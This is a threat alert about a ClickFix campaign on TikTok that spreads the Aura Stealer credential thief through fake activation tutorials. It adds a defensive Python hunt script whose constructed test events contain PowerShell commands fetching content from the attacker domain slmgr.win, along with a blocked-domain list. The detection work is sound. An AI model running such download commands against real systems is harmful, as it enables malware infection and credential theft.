TikTok-Hosted ClickFix Campaign Spreads Aura Stealer Malware
Category: Threat Alerts / Malware & Campaigns
Cybercriminals use TikTok to distribute the Aura Stealer malware via PowerShell-based ClickFix attacks disguised as activation tutorials for Windows and Adobe products. Source: BleepingComputer.
CORTEX Protocol Intelligence Assessment
Business Impact: Credential theft and session hijacking via social platforms.
Technical Context: The PowerShell scripts connect to Cloudflare-hosted payloads that steal browser and crypto credentials.
Strategic Intelligence Guidance
- Block the slmgr.win domain and related IoCs.
- Restrict PowerShell execution on enterprise endpoints.
- Educate users on avoiding software activation scams.
- Implement behavioral EDR for detection of PowerShell-based threats.
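Blocking the domain covers new connections; a retrospective hunt shows which endpoints already launched PowerShell with a reference to it. The following is an added example, not code from the alert or from BleepingComputer. It assumes process-creation events exported with `Computer`, `Image` and `CommandLine` fields; the events, host names, subdomain and `PLACEHOLDER` paths are constructed.

```python
import re

# slmgr.win is the IoC named in the alert; everything else here is constructed.
BLOCKED_DOMAINS = {"slmgr.win"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Any dotted, host-like token counts, with or without a URL scheme. A domain
# appearing in a path or argument also matches: the hunt is biased to recall.
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)


def is_blocked(host):
    """True for a blocked domain or one of its subdomains, not lookalikes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def blocked_hosts(command_line):
    """Return the blocked hosts referenced anywhere in a command line."""
    found = {h.lower() for h in HOST_RE.findall(command_line)}
    return sorted(h for h in found if is_blocked(h))


def hunt(events):
    """Return (computer, hosts) for PowerShell launches that name the IoC."""
    hits = []
    for ev in events:
        image = ev["Image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
        hosts = blocked_hosts(ev["CommandLine"])
        if image in POWERSHELL_IMAGES and hosts:
            hits.append((ev["Computer"], hosts))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed process-creation events
    {"Computer": "WS-014", "Image": PS, "CommandLine":
     'powershell.exe -Command "Invoke-RestMethod https://SLMGR.win/PLACEHOLDER"'},
    {"Computer": "WS-022", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest http://cdn.slmgr.win/PLACEHOLDER"},
    {"Computer": "WS-031", "Image": PS,  # lookalike, must not match
     "CommandLine": "powershell Test-Connection notslmgr.win"},
    {"Computer": "WS-040", "Image": PS,  # IoC as a label of another domain
     "CommandLine": "powershell Resolve-DnsName slmgr.win.example.com"},
    {"Computer": "WS-055", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c ping slmgr.win"},  # not PowerShell, out of scope
]

if __name__ == "__main__":
    for computer, hosts in hunt(SAMPLE_EVENTS):
        print(computer, ", ".join(hosts))
```

Matching on the exact domain or a dot-prefixed suffix is what keeps `notslmgr.win` and `slmgr.win.example.com` out of the results, which a plain substring search would flag.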
Intelligence Source: TikTok videos continue to push infostealers in ClickFix attacks | Oct 20, 2025